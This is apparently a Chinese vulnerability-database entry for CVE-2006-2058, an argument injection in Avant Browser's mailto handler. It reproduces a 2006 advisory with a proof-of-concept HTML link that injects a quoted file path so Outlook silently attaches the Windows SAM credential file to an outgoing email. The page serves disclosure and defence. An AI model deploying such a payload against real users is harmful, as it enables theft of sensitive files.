Avant Browser 参数注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1195195 漏洞类型 未知
发布时间 2006-04-26 更新时间 2006-04-26
CVE编号 CVE-2006-2058 CNNVD-ID CNNVD-200604-520
漏洞平台 N/A CVSS评分 5.0
|漏洞来源
https://www.securityfocus.com/bid/87682
https://cxsecurity.com/issue/WLB-2006040106
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200604-520
|漏洞详情
AvantBrowser10.1Build17中存在参数注入漏洞。这使得用户辅助远程攻击者可以借助于电子邮件协议:模式处理器中的双引号字符修改传递到被调用的邮件客户端的命令行参数,如以任意文件名作为附件启动微软Outlook。
|漏洞EXP
** Inge Henriksen Security Advisory http://ingehenriksen.blogspot.com/ **

Advisory Name: Multiple browsers Windows mailto protocol Office 2003 file attachment exploit

Release Date: Not released

Tested and Confirmed Vulerable: 
Micrsoft Outlook 2003 SP 1
Microsoft Internet Explorer 6 SP2
Mozilla Firefox 1.06
Avant Browser 10.1 Build 17

Severity: Low

Type: Stealing files

From where: Remote

Discovered by: 
Inge Henriksen (inge.henriksen (at) booleansoft (dot) com [email concealed]) http://ingehenriksen.blogspot.com/

Vendor Status: Not notified

Overview:
Application protocols handling in Microsoft Windows is badly designed, i.e. when someone types 
mailto:someone (at) somewhere (dot) com [email concealed] into a browser the protocol is first looked up under
HKEY_CLASSES_ROOT%protocol%shellopencommand, if it is a protocol that is allowed under the
current user context then the value is simply replaced by the contents in the address bar at %1. In
our example

"C:PROGRA~1MICROS~3OFFICE11OUTLOOK.EXE" -c IPM.Note /m "%1"

would become

"C:PROGRA~1MICROS~3OFFICE11OUTLOOK.EXE" -c IPM.Note /m "mailto:someone (at) somewhere (dot) com [email concealed]"

There is absolutely no input validation in all the browsers I have tested, i.e. there are exploits
availible by entering more data into the address bar than was intended.

Proof-of Concept:

The mailto application protocol can be axploited by entering <email>""<filepath>, this will cause
OUTLOOK.EXE to attach the file <filepath> to the email without asking for permission, thus opening
up for sensitive files to be stolen when a user sends an email it is fair to believe that many
people would not notice the attached file before sending the email.

To attach the SAM file to a email a html file could contain this:

<a href='mailto:someone (at) somewhere (dot) com [email concealed]""..........windowsREPAIRSAM'>C
lick here to email me</a>

The command being run would now be:

"C:PROGRA~1MICROS~3OFFICE11OUTLOOK.EXE" -c IPM.Note /m "mailto:someone (at) somewhere (dot) com [email concealed]""..........windowsREPAIRSAM"

, thus attaching the SAM file.
|受影响的产品
Avant Force Avant Browser 10.1 Build 17
|参考资料

来源:BUGTRAQ
名称:20060424MultiplebrowsersWindowsmailtoprotocolOffice2003fileattachmentexploit
链接:http://www.securityfocus.com/archive/1/archive/1/432009/100/0/threaded
来源:MISC
链接:http://ingehenriksen.blogspot.com/2006/04/office-2003-file-attachment-exploit.html
来源:XF
名称:office-mailto-obtain-information(26118)
链接:http://xforce.iss.net/xforce/xfdb/26118
来源:VUPEN
名称:ADV-2006-1538
链接:http://www.frsirt.com/english/advisories/2006/1538
来源:SREASON
名称:785
链接:http://securityreason.com/securityalert/785